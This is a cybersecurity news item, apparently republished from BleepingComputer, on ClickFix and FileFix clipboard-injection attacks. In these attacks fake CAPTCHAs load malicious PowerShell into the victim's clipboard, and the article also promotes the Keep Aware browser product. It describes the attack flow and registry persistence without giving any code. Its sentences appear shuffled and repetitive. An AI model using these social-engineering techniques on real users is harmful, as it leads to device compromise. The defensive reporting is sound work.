Coined initially as “ClickFix” because the social engineering prompts were telling the user they ought to “fix” a problem with their browser and required the user to click an element, this term is now ascribed to any similar attack, one in which a user clicks an element, the page then populates the victim’s clipboard, and it instructs the user to paste the malicious code into their device’s terminal. ClickFix attacks use malicious JavaScript, clipboard manipulation, and social engineering to ultimately gain the attacker access from the browser to the host device. Like ClickFix, the FileFix attack originates in the browser and relies on social engineering, clipboard injection, and user action to cross the boundary between browser and host. By monitoring clipboard access patterns, flagging suspicious web pages, and disrupting lateral movement techniques like ClickFix, Keep Aware empowers organizations to shut down attacks before they ever leave the browser and reach the host. Ultimately, the attacker is attempting to get a user to (unknowingly) execute malicious code, gathered from the browser and quietly placed into the user’s clipboard, on the host machine. Upon clicking the fake CAPTCHA, malicious JavaScript updates the user’s clipboard with malicious PowerShell code and prompts the user to paste it into the Windows Run dialog. Browser security solutions, like Keep Aware, detect clipboard population attempts in real-time and intercept suspicious code before it ever reaches the host device. Once the user clicks the fake CAPTCHA, the page silently populates the user’s clipboard with malicious code. However, Keep Aware identified, blocked, and warned the user of the suspicious commands the page attempted to populate the clipboard with, effectively preventing device compromise. If the social engineering tactic had been successful and no technical controls had been in place, the user would have unknowingly executed malicious PowerShell code. The user had clicked on the prompt, allowing the page to populate the clipboard (with malicious PowerShell), and instructing the user to paste into the device’s terminal. ClickFix, a deceptive social engineering tactic, is used by threat actors to manipulate unsuspecting users into unwittingly allowing a web page to silently populate the clipboard. When left undeterred by technical defenses, these seemingly simple clipboard attacks can escalate into full-system compromise, giving threat actors remote control, access to sensitive data, and persistent footholds that are difficult to detect and even harder to remove. This kicks of a series of downloads, de-obfuscation, assembling malware on the host machine, and setting up persistence in the user’s Run registry key—enabling the malware to persist on the compromised device and run each time the user logs in to their computer account. It has been seen on both malicious and compromised web pages and has been used by multiple threat groups to gain access to victim machines, ultimately deploying malware and remote access trojans (RATs), including AsyncRAT, Skuld Stealer, Lumma Stealer, DarkGate malware, DanaBot stealer, and more. The full data copied to the user’s clipboard is a malicious PowerShell command ending in a comment containing a file path. These clipboard-based techniques use social engineering and abuse the user's interaction with seemingly legitimate, or even compromised, websites to deliver malicious code.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Thu, 31 Jul 2025 14:20:29 +0000